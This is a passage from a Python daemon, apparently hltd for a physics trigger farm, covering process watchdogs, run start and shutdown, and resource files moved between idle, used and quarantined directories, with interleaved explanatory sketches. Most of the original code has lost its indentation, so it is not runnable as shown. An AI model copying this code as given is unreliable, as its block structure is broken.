logger.debug("watchdog thread for "+str(self.process.pid)+" is alive "
+ str(self.watchdog.is_alive()))
else:
#release lock while joining thread to let it complete
resource_lock.release()
self.watchdog.join()
resource_lock.acquire()
self.processstate = 100
self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
self.watchdog.start()
logger.debug("watchdog thread restarted for "+str(self.process.pid)+" is alive "
+ str(self.watchdog.is_alive()))
except Exception as ex:
logger.info("OnlineResource: exception encountered in forking hlt slave")
logger.info(ex)
def join(self):
logger.debug('calling join on thread ' +self.watchdog.name)
self.watchdog.join()
def clearQuarantined(self,doLock=True,restore=True):
global q_list
retq=[]
if not restore:
q_list+=self.quarantined
return self.quarantined
if doLock:resource_lock.acquire()
try:
for cpu in self.quarantined:
logger.info('Clearing quarantined resource '+cpu)
os.rename(quarantined+cpu,idles+cpu)
retq.append(cpu)
self.quarantined = []
self.parent.n_used=0
self.parent.n_quarantined=0
except Exception as ex:
logger.exception(ex)
if doLock:resource_lock.release()
return retq
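
# --- illustrative sketch (not part of hltd) -----------------------------------
# Resource accounting in this file is done by renaming a per-core marker file
# between state directories (idle, used, except/broken, quarantined, cloud).
# A minimal helper capturing that pattern, assuming each state is a directory
# and each core an empty file inside it:
def _example_move_resource(core, from_dir, to_dir):
    import os
    # os.rename is atomic within one filesystem, which is what makes this
    # file-per-core bookkeeping safe against concurrent readers
    os.rename(os.path.join(from_dir, core), os.path.join(to_dir, core))
# -------------------------------------------------------------------------------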
class ProcessWatchdog(threading.Thread):
def __init__(self,resource,lock,inputdirpath):
threading.Thread.__init__(self)
self.resource = resource
self.lock = lock
self.inputdirpath=inputdirpath
self.retry_limit = conf.process_restart_limit
self.retry_delay = conf.process_restart_delay_sec
self.quarantined = False
def run(self):
try:
logger.info('watchdog thread for process '+str(self.resource.process.pid) + ' on resource '+str(self.resource.cpu)+" for run "+str(self.resource.runnumber) + ' started ')
self.resource.process.wait()
returncode = self.resource.process.returncode
pid = self.resource.process.pid
#update json process monitoring file
self.resource.processstate=returncode
outdir = self.resource.assigned_run_dir
abortedmarker = os.path.join(outdir,Run.ABORTED)
stoppingmarker = os.path.join(outdir,Run.STOPPING)
abortcompletemarker = os.path.join(outdir,Run.ABORTCOMPLETE)
completemarker = os.path.join(outdir,Run.COMPLETE)
rnsuffix = str(self.resource.runnumber).zfill(conf.run_number_padding)
if os.path.exists(abortedmarker):
resource_lock.acquire()
#release resources
try:
for cpu in self.resource.cpu:
try:
os.rename(used+cpu,idles+cpu)
self.resource.parent.n_used-=1
except Exception as ex:
logger.exception(ex)
except:pass
resource_lock.release()
return
#input dir check if cmsRun can not find the input
inputdir_exists = os.path.exists(self.inputdirpath)
            configuration_reachable = not (conf.dqm_machine==False and returncode==90 and not inputdir_exists)
if conf.dqm_machine==False and returncode==90 and inputdir_exists:
if not os.path.exists(os.path.join(self.inputdirpath,'hlt','HltConfig.py')):
logger.error("input run dir exists, but " + str(os.path.join(self.inputdirpath,'hlt','HltConfig.py')) + " is not present (cmsRun exit code 90)")
configuration_reachable=False
#cleanup actions- remove process from list and attempt restart on same resource
if returncode != 0 and returncode!=None and configuration_reachable:
#bump error count in active_runs_errors which is logged in the box file
self.resource.parent.num_errors+=1
if returncode < 0:
logger.error("process "+str(pid)
+" for run "+str(self.resource.runnumber)
+" on resource(s) " + str(self.resource.cpu)
+" exited with signal "
+str(returncode) + ', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
)
else:
logger.error("process "+str(pid)
+" for run "+str(self.resource.runnumber)
+" on resource(s) " + str(self.resource.cpu)
+" exited with code "
+str(returncode) +', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
)
#quit codes (configuration errors):
quit_codes = [127,90,73]
#removed 65 because it is not only configuration error
#quit_codes = [127,90,65,73]
#dqm mode will treat configuration error as a crash and eventually move to quarantined
if conf.dqm_machine==False and returncode in quit_codes:
if self.resource.retry_attempts < self.retry_limit:
logger.warning('for this type of error, restarting this process is disabled')
self.resource.retry_attempts=self.retry_limit
if returncode==127:
logger.fatal('Exit code indicates that CMSSW environment might not be available (cmsRun executable not in path).')
elif returncode==90:
logger.fatal('Exit code indicates that there might be a python error in the CMSSW configuration.')
else:
logger.fatal('Exit code indicates that there might be a C/C++ error in the CMSSW configuration.')
#generate crashed pid json file like: run000001_ls0000_crash_pid12345.jsn
oldpid = "pid"+str(pid).zfill(5)
runnumber = "run"+str(self.resource.runnumber).zfill(conf.run_number_padding)
ls = "ls0000"
filename = "_".join([runnumber,ls,"crash",oldpid])+".jsn"
filepath = os.path.join(outdir,filename)
document = {"errorCode":returncode}
try:
with open(filepath,"w+") as fi:
json.dump(document,fi)
except: logger.exception("unable to create %r" %filename)
logger.info("pid crash file: %r" %filename)
if self.resource.retry_attempts < self.retry_limit:
"""
sleep a configurable amount of seconds before
trying a restart. This is to avoid 'crash storms'
"""
time.sleep(self.retry_delay)
self.resource.process = None
self.resource.retry_attempts += 1
logger.info("try to restart process for resource(s) "
+str(self.resource.cpu)
+" attempt "
+ str(self.resource.retry_attempts))
resource_lock.acquire()
for cpu in self.resource.cpu:
os.rename(used+cpu,broken+cpu)
self.resource.parent.n_used-=1
resource_lock.release()
logger.debug("resource(s) " +str(self.resource.cpu)+
" successfully moved to except")
elif self.resource.retry_attempts >= self.retry_limit:
logger.info("process for run "
+str(self.resource.runnumber)
+" on resources " + str(self.resource.cpu)
+" reached max retry limit "
)
resource_lock.acquire()
for cpu in self.resource.cpu:
os.rename(used+cpu,quarantined+cpu)
self.resource.quarantined.append(cpu)
self.resource.parent.n_quarantined+=1
resource_lock.release()
self.quarantined=True
#write quarantined marker for RunRanger
try:
os.remove(conf.watch_directory+'/quarantined'+rnsuffix)
except:
pass
try:
with open(conf.watch_directory+'/quarantined'+rnsuffix,'w+') as fp:
pass
except Exception as ex:
logger.exception(ex)
#successful end= release resource (TODO:maybe should mark aborted for non-0 error codes)
elif returncode == 0 or returncode == None or not configuration_reachable:
if not configuration_reachable:
logger.info('pid '+str(pid)+' exit 90 (input directory and menu missing) from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
else:
logger.info('pid '+str(pid)+' exit 0 from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
# generate an end-of-run marker if it isn't already there - it will be picked up by the RunRanger
endmarker = conf.watch_directory+'/end'+rnsuffix
if not os.path.exists(endmarker):
with open(endmarker,'w+') as fp:
pass
count=0
# wait until the request to end has been handled
while not os.path.exists(stoppingmarker):
if os.path.exists(completemarker):
break
if os.path.exists(abortedmarker) or os.path.exists(abortcompletemarker):
logger.warning('quitting watchdog thread because run ' + str(self.resource.runnumber) + ' has been aborted ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
break
if not os.path.exists(outdir):
logger.warning('quitting watchdog thread because run directory ' + outdir + ' has disappeared ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
break
time.sleep(.1)
count+=1
if count>=100 and count%100==0:
logger.warning("still waiting for complete marker for run "+str(self.resource.runnumber) + ' in watchdog for resource '+str(self.resource.cpu))
# move back the resource now that it's safe since the run is marked as ended
resource_lock.acquire()
for cpu in self.resource.cpu:
try:
os.rename(used+cpu,idles+cpu)
except Exception as ex:
logger.warning('problem moving core ' + cpu + ' from used to idle:'+str(ex))
resource_lock.release()
#logger.info('exiting watchdog thread for '+str(self.resource.cpu))
except Exception as ex:
logger.info("OnlineResource watchdog: exception")
logger.exception(ex)
try:resource_lock.release()
except:pass
return
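
# --- illustrative sketch (not part of hltd) -----------------------------------
# ProcessWatchdog.run above drops a marker such as
# run000001_ls0000_crash_pid12345.jsn when a job exits with a configuration
# error. A sketch of that naming scheme, assuming the padding widths used
# above (run number padded via conf.run_number_padding, pid to 5 digits):
def _example_crash_marker_name(runnumber, pid, run_number_padding=6):
    runpart = "run" + str(runnumber).zfill(run_number_padding)
    pidpart = "pid" + str(pid).zfill(5)
    return "_".join([runpart, "ls0000", "crash", pidpart]) + ".jsn"
# -------------------------------------------------------------------------------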
class Run:
STARTING = 'starting'
ACTIVE = 'active'
STOPPING = 'stopping'
ABORTED = 'aborted'
COMPLETE = 'complete'
ABORTCOMPLETE = 'abortcomplete'
VALID_MARKERS = [STARTING,ACTIVE,STOPPING,COMPLETE,ABORTED,ABORTCOMPLETE]
def __init__(self,nr,dirname,bu_dir,instance):
self.pending_shutdown=False
self.is_ongoing_run=True
self.num_errors = 0
self.instance = instance
self.runnumber = nr
self.dirname = dirname
self.online_resource_list = []
self.anelastic_monitor = None
self.elastic_monitor = None
self.elastic_test = None
self.arch = None
self.version = None
self.transfermode = None
self.waitForEndThread = None
self.beginTime = datetime.datetime.now()
self.anelasticWatchdog = None
self.elasticBUWatchdog = None
self.completedChecker = None
self.runShutdown = None
self.threadEvent = threading.Event()
self.stopThreads = False
#stats on usage of resources
self.n_used = 0
self.n_quarantined = 0
self.inputdir_exists = False
if conf.role == 'fu':
self.changeMarkerMaybe(Run.STARTING)
#TODO:raise from runList
# if int(self.runnumber) in active_runs:
# raise Exception("Run "+str(self.runnumber)+ "already active")
self.hlt_directory = os.path.join(bu_dir,conf.menu_directory)
self.menu_path = os.path.join(self.hlt_directory,conf.menu_name)
self.paramfile_path = os.path.join(self.hlt_directory,conf.paramfile_name)
readMenuAttempts=0
#polling for HLT menu directory
def paramsPresent():
return os.path.exists(self.hlt_directory) and os.path.exists(self.menu_path) and os.path.exists(self.paramfile_path)
paramsDetected = False
while conf.dqm_machine==False and conf.role=='fu':
if paramsPresent():
try:
with open(self.paramfile_path,'r') as fp:
fffparams = json.load(fp)
self.arch = fffparams['SCRAM_ARCH']
self.version = fffparams['CMSSW_VERSION']
self.transfermode = fffparams['TRANSFER_MODE']
paramsDetected = True
logger.info("Run " + str(self.runnumber) + " uses " + self.version + " ("+self.arch + ") with " + str(conf.menu_name) + ' transferDest:'+self.transfermode)
break
except ValueError as ex:
if readMenuAttempts>50:
logger.exception(ex)
break
except Exception as ex:
if readMenuAttempts>50:
logger.exception(ex)
break
else:
if readMenuAttempts>50:
if not os.path.exists(bu_dir):
logger.info("FFF parameter or HLT menu files not found in ramdisk - BU run directory is gone")
else:
logger.error("FFF parameter or HLT menu files not found in ramdisk")
break
readMenuAttempts+=1
time.sleep(.1)
continue
if not paramsDetected:
self.arch = conf.cmssw_arch
self.version = conf.cmssw_default_version
self.menu_path = conf.test_hlt_config1
self.transfermode = 'null'
if conf.role=='fu':
logger.warning("Using default values for run " + str(self.runnumber) + ": " + self.version + " (" + self.arch + ") with " + self.menu_path)
#give this command line parameter quoted in case it is empty
if len(self.transfermode)==0:
self.transfermode='null'
#backup HLT menu and parameters
if conf.role=='fu':
try:
hltTargetName = 'HltConfig.py_run'+str(self.runnumber)+'_'+self.arch+'_'+self.version+'_'+self.transfermode
shutil.copy(self.menu_path,os.path.join(conf.log_dir,'pid',hltTargetName))
except:
logger.warning('Unable to backup HLT menu')
self.rawinputdir = None
#
if conf.role == "bu":
try:
self.rawinputdir = conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
os.stat(self.rawinputdir)
self.inputdir_exists = True
            except Exception as ex:
logger.error("failed to stat "+self.rawinputdir)
try:
os.mkdir(self.rawinputdir+'/mon')
                except Exception as ex:
logger.error("could not create mon dir inside the run input directory")
else:
self.rawinputdir= os.path.join(bu_disk_list_ramdisk_instance[0],'run' + str(self.runnumber).zfill(conf.run_number_padding))
#verify existence of the input directory
if conf.role=='fu':
if not paramsDetected and conf.dqm_machine==False:
try:
os.stat(self.rawinputdir)
self.inputdir_exists = True
except:
logger.warning("unable to stat raw input directory for run "+str(self.runnumber))
return
else:
self.inputdir_exists = True
self.lock = threading.Lock()
if conf.use_elasticsearch == True:
global nsslock
try:
if conf.role == "bu":
nsslock.acquire()
logger.info("starting elasticbu.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/elasticbu.py',self.instance,str(self.runnumber)]
else:
logger.info("starting elastic.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/elastic.py',self.dirname,self.rawinputdir+'/mon',str(expected_processes)]
self.elastic_monitor = subprocess.Popen(elastic_args,
preexec_fn=preexec_function,
close_fds=True
)
except OSError as ex:
logger.error("failed to start elasticsearch client")
logger.error(ex)
try:nsslock.release()
except:pass
if conf.role == "fu" and conf.dqm_machine==False:
try:
logger.info("starting anelastic.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/anelastic.py',self.dirname,str(self.runnumber), self.rawinputdir,bu_disk_list_output_instance[0]]
self.anelastic_monitor = subprocess.Popen(elastic_args,
preexec_fn=preexec_function,
close_fds=True
)
except OSError as ex:
logger.fatal("failed to start anelastic.py client:")
logger.exception(ex)
sys.exit(1)
def __del__(self):
self.stopThreads=True
self.threadEvent.set()
if self.completedChecker:
try:
self.completedChecker.join()
except RuntimeError:
pass
if self.elasticBUWatchdog:
try:
self.elasticBUWatchdog.join()
except RuntimeError:
pass
if self.runShutdown:
self.joinShutdown()
logger.info('Run '+ str(self.runnumber) +' object __del__ has completed')
def countOwnedResourcesFrom(self,resourcelist):
ret = 0
try:
for p in self.online_resource_list:
for c in p.cpu:
for resourcename in resourcelist:
if resourcename == c:
ret+=1
except:pass
return ret
def AcquireResource(self,resourcenames,fromstate):
idles = conf.resource_base+'/'+fromstate+'/'
try:
logger.debug("Trying to acquire resource "
+str(resourcenames)
+" from "+fromstate)
for resourcename in resourcenames:
os.rename(idles+resourcename,used+resourcename)
self.n_used+=1
#TODO:fix core pairing with resource.cpu list (otherwise - restarting will not work properly)
if not filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list):
logger.debug("resource(s) "+str(resourcenames)
+" not found in online_resource_list, creating new")
self.online_resource_list.append(OnlineResource(self,resourcenames,self.lock))
return self.online_resource_list[-1]
logger.debug("resource(s) "+str(resourcenames)
+" found in online_resource_list")
return filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list)[0]
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.info(ex)
def MatchResource(self,resourcenames):
for res in self.online_resource_list:
#first resource in the list is the one that triggered inotify event
if resourcenames[0] in res.cpu:
found_all = True
for name in res.cpu:
if name not in resourcenames:
found_all = False
if found_all:
return res.cpu
return None
def ContactResource(self,resourcename):
self.online_resource_list.append(OnlineResource(self,resourcename,self.lock))
        self.online_resource_list[-1].ping() #@@MO this is not doing anything useful, afaict
def ReleaseResource(self,res):
self.online_resource_list.remove(res)
def AcquireResources(self,mode):
logger.info("acquiring resources from "+conf.resource_base)
idles = conf.resource_base
idles += '/idle/' if conf.role == 'fu' else '/boxes/'
try:
dirlist = os.listdir(idles)
        except Exception as ex:
            logger.info("exception encountered in looking for resources")
            logger.info(ex)
            return False
        logger.info(str(dirlist))
current_time = time.time()
count = 0
cpu_group=[]
#self.lock.acquire()
global machine_blacklist
bldir = os.path.join(self.dirname,'hlt')
blpath = os.path.join(self.dirname,'hlt','blacklist')
if conf.role=='bu':
attempts=100
while not os.path.exists(bldir) and attempts>0:
time.sleep(0.05)
attempts-=1
if attempts<=0:
logger.error('Timeout waiting for directory '+ bldir)
break
if os.path.exists(blpath):
update_success,machine_blacklist=updateBlacklist(blpath)
else:
logger.error("unable to find blacklist file in "+bldir)
for cpu in dirlist:
#skip self
if conf.role=='bu':
if cpu == os.uname()[1]:continue
if cpu in machine_blacklist:
logger.info("skipping blacklisted resource "+str(cpu))
continue
if self.checkStaleResourceFile(idles+cpu):
logger.error("Skipping stale resource "+str(cpu))
continue
count = count+1
try:
age = current_time - os.path.getmtime(idles+cpu)
cpu_group.append(cpu)
if conf.role == 'fu':
if count == nstreams:
self.AcquireResource(cpu_group,'idle')
cpu_group=[]
count=0
else:
logger.info("found resource "+cpu+" which is "+str(age)+" seconds old")
if age < 10:
cpus = [cpu]
self.ContactResource(cpus)
except Exception as ex:
logger.error('encountered exception in acquiring resource '+str(cpu)+':'+str(ex))
return True
#self.lock.release()
def checkStaleResourceFile(self,resourcepath):
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
time.sleep(.05)
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
logger.warning('can not parse ' + str(resourcepath))
return False
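    # Illustrative note: the resource file parsed above is the per-host box
    # JSON written by system_monitor; 'detectedStaleHandle' is set there when
    # an NFS stat of the watch directory hangs or fails, hence the second
    # parse attempt after a short sleep before declaring the file unreadable.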
def CheckTemplate(self):
if conf.role=='bu' and conf.use_elasticsearch:
logger.info("checking ES template")
try:
setupES(forceReplicas=conf.force_replicas)
except Exception as ex:
logger.error("Unable to check run appliance template:"+str(ex))
def Start(self):
self.is_ongoing_run = True
#create mon subdirectory before starting
try:
os.makedirs(os.path.join(self.dirname,'mon'))
except OSError:
pass
#start/notify run for each resource
if conf.role == 'fu':
for resource in self.online_resource_list:
logger.info('start run '+str(self.runnumber)+' on cpu(s) '+str(resource.cpu))
self.StartOnResource(resource)
if conf.dqm_machine==False:
self.changeMarkerMaybe(Run.ACTIVE)
#start safeguard monitoring of anelastic.py
self.startAnelasticWatchdog()
elif conf.role == 'bu':
for resource in self.online_resource_list:
logger.info('start run '+str(self.runnumber)+' on resources '+str(resource.cpu))
resource.NotifyNewRunStart(self.runnumber)
#update begin time at this point
self.beginTime = datetime.datetime.now()
for resource in self.online_resource_list:
resource.NotifyNewRunJoin()
logger.info('sent start run '+str(self.runnumber)+' notification to all resources')
self.startElasticBUWatchdog()
self.startCompletedChecker()
def maybeNotifyNewRun(self,resourcename,resourceage):
if conf.role=='fu':
logger.fatal('this function should *never* have been called when role == fu')
return
if self.rawinputdir != None:
#TODO:check also for EoR file?
try:
os.stat(self.rawinputdir)
except:
logger.warning('Unable to find raw directory of '+str(self.runnumber))
return None
for resource in self.online_resource_list:
if resourcename in resource.cpu:
logger.error('Resource '+str(resource.cpu)+' was already processing run ' + str(self.runnumber) + '. Will not participate in this run.')
return None
if resourcename in machine_blacklist:
logger.info("skipping blacklisted resource "+str(resource.cpu))
return None
current_time = time.time()
age = current_time - resourceage
logger.info("found resource "+resourcename+" which is "+str(age)+" seconds old")
if age < 10:
self.ContactResource([resourcename])
return self.online_resource_list[-1]
else:
return None
def StartOnResource(self, resource):
logger.debug("StartOnResource called")
resource.assigned_run_dir=conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
resource.StartNewProcess(self.runnumber,
self.online_resource_list.index(resource),
self.arch,
self.version,
self.menu_path,
self.transfermode,
int(round((len(resource.cpu)*float(nthreads)/nstreams))),
len(resource.cpu))
logger.debug("StartOnResource process started")
def Stop(self):
#used to gracefully stop CMSSW and finish scripts
with open(os.path.join(self.dirname,"temp_CMSSW_STOP"),'w') as f:
writedoc = {}
bu_lumis = []
try:
bu_eols_files = filter( lambda x: x.endswith("_EoLS.jsn"),os.listdir(self.rawinputdir))
bu_lumis = (sorted([int(x.split('_')[1][2:]) for x in bu_eols_files]))
except:
logger.error("Unable to parse BU EoLS files")
ls_delay=3
if len(bu_lumis):
logger.info('last closed lumisection in ramdisk is '+str(bu_lumis[-1])+', requesting to close at LS '+ str(bu_lumis[-1]+ls_delay))
writedoc['lastLS']=bu_lumis[-1]+ls_delay #current+delay
else: writedoc['lastLS']=ls_delay
json.dump(writedoc,f)
try:
os.rename(os.path.join(self.dirname,"temp_CMSSW_STOP"),os.path.join(self.dirname,"CMSSW_STOP"))
except:pass
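    # Illustrative note: the CMSSW_STOP document written by Stop() above is a
    # single-key JSON file, e.g. {"lastLS": 42}, telling the jobs at which
    # lumisection to stop; it is written under a temp name and renamed so that
    # watchers never pick up a partially written file.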
def startShutdown(self,killJobs=False,killScripts=False):
self.runShutdown = threading.Thread(target = self.Shutdown,args=[killJobs,killScripts])
self.runShutdown.start()
def joinShutdown(self):
if self.runShutdown:
try:
self.runShutdown.join()
except:
return
def Shutdown(self,killJobs=False,killScripts=False):
        #herod mode sends SIGKILL to all processes, but waits for all scripts to finish
logger.info("run"+str(self.runnumber)+": Shutdown called")
self.pending_shutdown=False
self.is_ongoing_run = False
try:
self.changeMarkerMaybe(Run.ABORTED)
except OSError as ex:
pass
time.sleep(.1)
try:
for resource in self.online_resource_list:
if resource.processstate==100:
logger.info('terminating process '+str(resource.process.pid)+
' in state '+str(resource.processstate)+' owning '+str(resource.cpu))
if killJobs:resource.process.kill()
else:resource.process.terminate()
if resource.watchdog!=None and resource.watchdog.is_alive():
try:
resource.join()
except:
pass
logger.info('process '+str(resource.process.pid)+' terminated')
time.sleep(.1)
logger.info(' releasing resource(s) '+str(resource.cpu))
resource_lock.acquire()
q_clear_condition = (not self.checkQuarantinedLimit()) or conf.auto_clear_quarantined
for resource in self.online_resource_list:
cleared_q = resource.clearQuarantined(doLock=False,restore=q_clear_condition)
for cpu in resource.cpu:
if cpu not in cleared_q:
try:
os.rename(used+cpu,idles+cpu)
self.n_used-=1
except OSError:
#@SM:can happen if it was quarantined
logger.warning('Unable to find resource '+used+cpu)
except Exception as ex:
resource_lock.release()
raise(ex)
resource.process=None
resource_lock.release()
logger.info('completed clearing resource list')
self.online_resource_list = []
try:
self.changeMarkerMaybe(Run.ABORTCOMPLETE)
except OSError as ex:
pass
try:
if self.anelastic_monitor:
if killScripts:
self.anelastic_monitor.terminate()
self.anelastic_monitor.wait()
except OSError as ex:
if ex.errno==3:
logger.info("anelastic.py for run " + str(self.runnumber) + " is not running")
except Exception as ex:
logger.exception(ex)
if conf.use_elasticsearch == True:
try:
if self.elastic_monitor:
if killScripts:
self.elastic_monitor.terminate()
#allow monitoring thread to finish, but no more than 30 seconds after others
killtimer = threading.Timer(30., self.elastic_monitor.kill)
try:
killtimer.start()
self.elastic_monitor.wait()
finally:
killtimer.cancel()
try:self.elastic_monitor=None
except:pass
except OSError as ex:
if ex.errno==3:
logger.info("elastic.py for run " + str(self.runnumber) + " is not running")
else :logger.exception(ex)
except Exception as ex:
logger.exception(ex)
if self.waitForEndThread is not None:
self.waitForEndThread.join()
except Exception as ex:
logger.info("exception encountered in shutting down resources")
logger.exception(ex)
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
try:
if conf.delete_run_dir is not None and conf.delete_run_dir == True:
shutil.rmtree(conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding))
os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
except:
pass
logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' completed')
def ShutdownBU(self):
self.is_ongoing_run = False
try:
if self.elastic_monitor:
#first check if process is alive
if self.elastic_monitor.poll() is None:
self.elastic_monitor.terminate()
time.sleep(.1)
except Exception as ex:
logger.info("exception encountered in shutting down elasticbu.py: " + str(ex))
#logger.exception(ex)
#should also trigger destructor of the Run
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' on BU completed')
def StartWaitForEnd(self):
self.is_ongoing_run = False
self.changeMarkerMaybe(Run.STOPPING)
try:
self.waitForEndThread = threading.Thread(target = self.WaitForEnd)
self.waitForEndThread.start()
except Exception as ex:
logger.info("exception encountered in starting run end thread")
logger.info(ex)
def WaitForEnd(self):
logger.info("wait for end thread!")
global cloud_mode
global entering_cloud_mode
global abort_cloud_mode
try:
for resource in self.online_resource_list:
if resource.processstate is not None:
if resource.process is not None and resource.process.pid is not None: ppid = resource.process.pid
else: ppid="None"
logger.info('waiting for process '+str(ppid)+
' in state '+str(resource.processstate) +
' to complete ')
try:
resource.join()
logger.info('process '+str(resource.process.pid)+' completed')
except:pass
resource.clearQuarantined()
resource.process=None
self.online_resource_list = []
if conf.role == 'fu':
logger.info('writing complete file')
self.changeMarkerMaybe(Run.COMPLETE)
try:
os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
except:pass
try:
if conf.dqm_machine==False:
self.anelastic_monitor.wait()
            except OSError as ex:
if "No child processes" not in str(ex):
logger.info("Exception encountered in waiting for termination of anelastic:" +str(ex))
self.anelastic_monitor = None
if conf.use_elasticsearch == True:
try:
self.elastic_monitor.wait()
                except OSError as ex:
                    if "No child processes" not in str(ex):
                        logger.info("Exception encountered in waiting for termination of elastic:" +str(ex))
self.elastic_monitor = None
if conf.delete_run_dir is not None and conf.delete_run_dir == True:
try:
shutil.rmtree(self.dirname)
except Exception as ex:
logger.exception(ex)
global runList
#todo:clear this external thread
resource_lock.acquire()
logger.info("active runs.."+str(runList.getActiveRunNumbers()))
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
logger.info("new active runs.."+str(runList.getActiveRunNumbers()))
global resources_blocked_flag
if cloud_mode==True:
if len(runList.getActiveRunNumbers())>=1:
logger.info("VM mode: waiting for runs: " + str(runList.getActiveRunNumbers()) + " to finish")
else:
logger.info("No active runs. moving all resource files to cloud")
#give resources to cloud and bail out
entering_cloud_mode=False
#check if cloud mode switch has been aborted in the meantime
if abort_cloud_mode:
abort_cloud_mode=False
resources_blocked_flag=True
cloud_mode=False
resource_lock.release()
return
move_resources_to_cloud()
resource_lock.release()
ignite_cloud()
logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
try:resource_lock.release()
except:pass
except Exception as ex:
logger.error("exception encountered in ending run")
logger.exception(ex)
try:resource_lock.release()
except:pass
def changeMarkerMaybe(self,marker):
dir = self.dirname
current = filter(lambda x: x in Run.VALID_MARKERS, os.listdir(dir))
if (len(current)==1 and current[0] != marker) or len(current)==0:
if len(current)==1: os.remove(dir+'/'+current[0])
fp = open(dir+'/'+marker,'w+')
fp.close()
else:
logger.error("There are more than one markers for run "
+str(self.runnumber))
return
def checkQuarantinedLimit(self):
allQuarantined=True
for r in self.online_resource_list:
try:
if r.watchdog.quarantined==False or r.processstate==100:allQuarantined=False
except:
allQuarantined=False
if allQuarantined==True:
return True
else:
return False
def startAnelasticWatchdog(self):
try:
self.anelasticWatchdog = threading.Thread(target = self.runAnelasticWatchdog)
self.anelasticWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting anelastic watchdog thread")
logger.info(ex)
def runAnelasticWatchdog(self):
try:
self.anelastic_monitor.wait()
if self.is_ongoing_run == True:
#abort the run
self.anelasticWatchdog=None
logger.warning("Premature end of anelastic.py for run "+str(self.runnumber))
self.Shutdown(killJobs=True,killScripts=True)
except:
pass
self.anelastic_monitor=None
def startElasticBUWatchdog(self):
try:
self.elasticBUWatchdog = threading.Thread(target = self.runElasticBUWatchdog)
self.elasticBUWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting elasticbu watchdog thread")
logger.info(ex)
def runElasticBUWatchdog(self):
try:
self.elastic_monitor.wait()
except:
pass
self.elastic_monitor=None
def startCompletedChecker(self):
try:
logger.info('start checking completion of run '+str(self.runnumber))
self.completedChecker = threading.Thread(target = self.runCompletedChecker)
self.completedChecker.start()
        except Exception as ex:
logger.error('failure to start run completion checker:')
logger.exception(ex)
def runCompletedChecker(self):
rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
self.threadEvent.wait(10)
while self.stopThreads == False:
self.threadEvent.wait(5)
if os.path.exists(eorCheckPath) or os.path.exists(rundirCheckPath)==False:
logger.info("Completed checker: detected end of run "+str(self.runnumber))
break
while self.stopThreads==False:
self.threadEvent.wait(5)
success, runFound = self.checkNotifiedBoxes()
if success and runFound==False:
resource_lock.acquire()
try:
runList.remove(self.runnumber)
except Exception as ex:
logger.exception(ex)
resource_lock.release()
logger.info("Completed checker: end of processing of run "+str(self.runnumber))
break
def createEmptyEoRMaybe(self):
#this is used to notify elasticBU to fill the end time before it is terminated
rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
try:
os.stat(eorCheckPath)
except:
logger.info('creating empty EoR file in run directory '+rundirCheckPath)
try:
with open(eorCheckPath,'w') as fi:
pass
time.sleep(.5)
except Exception as ex:
logger.exception(ex)
def checkNotifiedBoxes(self):
keys = boxinfoFUMap.keys()
c_time = time.time()
for key in keys:
#if key==thishost:continue #checked in inotify thread
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:
#key deleted
return False,False
if c_time - etime > 20:continue
#parsing or file access, check failed
if lastStatus==False: return False,False
try:
#run is found in at least one box
if self.runnumber in edata['activeRuns']:return True,True
except:
#invalid boxinfo data
return False,False
#all box data are valid, run not found
return True,False
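
# --- illustrative sketch (not part of hltd) -----------------------------------
# checkNotifiedBoxes above scans boxinfoFUMap, whose values are
# (edata, etime, lastStatus): the parsed box JSON, the time it was read and
# whether the read succeeded. A standalone sketch of the same decision logic:
def _example_run_seen_on_any_box(boxmap, runnumber, now, max_age=20):
    """Return (check_ok, run_found), mirroring checkNotifiedBoxes."""
    for key in list(boxmap.keys()):
        try:
            edata, etime, last_status = boxmap[key]
        except Exception:
            return False, False     # entry deleted while iterating
        if now - etime > max_age:
            continue                # stale entry: skip this box
        if last_status is False:
            return False, False     # last read of this box file failed
        try:
            if runnumber in edata['activeRuns']:
                return True, True   # run seen on at least one box
        except Exception:
            return False, False     # malformed box data
    return True, False              # all box data valid, run not found
# -------------------------------------------------------------------------------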
class RunList:
def __init__(self):
self.runs = []
def add(self,runObj):
runNumber = runObj.runnumber
check = filter(lambda x: runNumber == x.runnumber,self.runs)
if len(check):
raise Exception("Run "+str(runNumber)+" already exists")
